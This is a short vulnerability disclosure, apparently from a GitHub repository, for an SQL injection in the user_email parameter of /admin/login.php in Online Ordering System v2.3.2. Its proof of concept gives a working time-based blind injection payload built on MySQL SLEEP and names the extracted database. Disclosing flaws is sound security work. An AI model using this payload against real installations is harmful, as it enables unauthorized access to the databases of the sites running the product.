Skip to content

Latest commit

 

History

History
22 lines (19 loc) · 900 Bytes

SQL-Injection-Vulnerability.md

File metadata and controls

22 lines (19 loc) · 900 Bytes

Online Ordering System By janobe - SQL injection vulnerability

  • Exploit Author: zerrr0

Vendor Homepage

Description

  • Due to lack of protection, parameter user_email in Online Ordering System By janobe v2.3.2 /admin/login.php can be abused to injection SQL queries to extract information from databases.
  • Vulnerability file: /admin/login.php
  • Parameter: user_email

Proof of Concept (PoC) :

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_email=admin' AND (SELECT 5888 FROM (SELECT(SLEEP(5)))eEFG) AND 'BaRZ'='BaRZ&user_pass=admin&btnLogin=
---
  • current database: multistoredb image